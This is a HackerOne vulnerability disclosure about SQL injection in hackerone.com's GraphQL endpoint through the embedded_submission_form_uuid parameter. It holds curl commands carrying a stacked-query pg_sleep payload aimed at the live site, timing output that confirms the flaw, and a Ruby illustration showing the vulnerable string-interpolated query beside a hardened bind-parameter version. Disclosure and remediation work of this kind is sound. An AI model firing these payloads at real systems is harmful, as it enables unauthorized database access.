HackerOne: SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter

2018-11-06T16:52:08
ID H1:435066
Type hackerone
Reporter jobert
Modified 2018-11-30T01:26:39

Description

The embedded_submission_form_uuid parameter of the /graphql endpoint is vulnerable to SQL injection. Execute either of the following commands to reproduce the behavior:

Locally:

curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27

HackerOne.com:

curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(30\)%3B--%27

Additional proof (response time tracks the pg_sleep argument):

$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(5\)%3B--%27
{}curl -X POST  0.03s user 0.01s system 0% cpu 5.726 total
$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(1\)%3B--%27
{}curl -X POST  0.03s user 0.01s system 2% cpu 1.631 total
$ time curl -X POST https://hackerone.com/graphql\?embedded_submission_form_uuid\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\(10\)%3B--%27
{}curl -X POST  0.02s user 0.01s system 0% cpu 10.557 total
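Added illustration (not HackerOne's code and not the reporter's): decoding the report's URL-encoded parameter, showing how a hypothetical string-interpolated query turns it into three stacked statements, and the hardened form that validates the UUID shape and passes the value as a bind parameter. The table name embedded_submission_forms and the query text are assumptions.

```ruby
require "cgi"

# Parameter value from the report's curl command, still URL-encoded
# (shell backslashes removed).
ENCODED_PAYLOAD = "1%27%3BSELECT%201%3BSELECT%20pg_sleep(30)%3B--%27".freeze

# Canonical 8-4-4-4-12 hex UUID; anything else is rejected before any SQL is built.
UUID_RE = /\A[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\z/i

# Hypothetical vulnerable pattern matching the symptom in the report:
# the raw parameter is interpolated straight into the SQL text.
def vulnerable_sql(uuid)
  "SELECT * FROM embedded_submission_forms WHERE uuid = '#{uuid}'"
end

# Hardened pattern: reject malformed input, then hand the value to the
# driver as a bind parameter ($1) so the database never parses it as SQL.
# Returns [sql, binds], or nil when the input is not a UUID.
def safe_query(uuid)
  return nil unless UUID_RE.match?(uuid)
  ["SELECT * FROM embedded_submission_forms WHERE uuid = $1", [uuid]]
end

# Split SQL text into statements the way a simple-query protocol would:
# on ';' outside single-quoted strings, dropping empty and comment-only parts.
def statements(sql)
  out, cur, in_str = [], +"", false
  sql.each_char do |c|
    in_str = !in_str if c == "'"
    if c == ";" && !in_str
      out << cur.strip
      cur = +""
    else
      cur << c
    end
  end
  out << cur.strip
  out.reject { |s| s.empty? || s.start_with?("--") }
end

if __FILE__ == $PROGRAM_NAME
  decoded = CGI.unescape(ENCODED_PAYLOAD)
  puts "decoded: #{decoded}"
  puts "interpolated query executes #{statements(vulnerable_sql(decoded)).length} statements"
  puts "hardened path result: #{safe_query(decoded).inspect}"
end
```

The interpolated query yields three statements (the original SELECT, SELECT 1, and SELECT pg_sleep(30)), which is exactly the delay the timing measurements above reveal; the hardened path returns nil for the same input.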

Impact

The SQL injection seems to be executing in the context of the secure schema, so the impact is currently unknown. However, since an attacker may be able to switch schemas, we should consider this to have a high impact on confidentiality.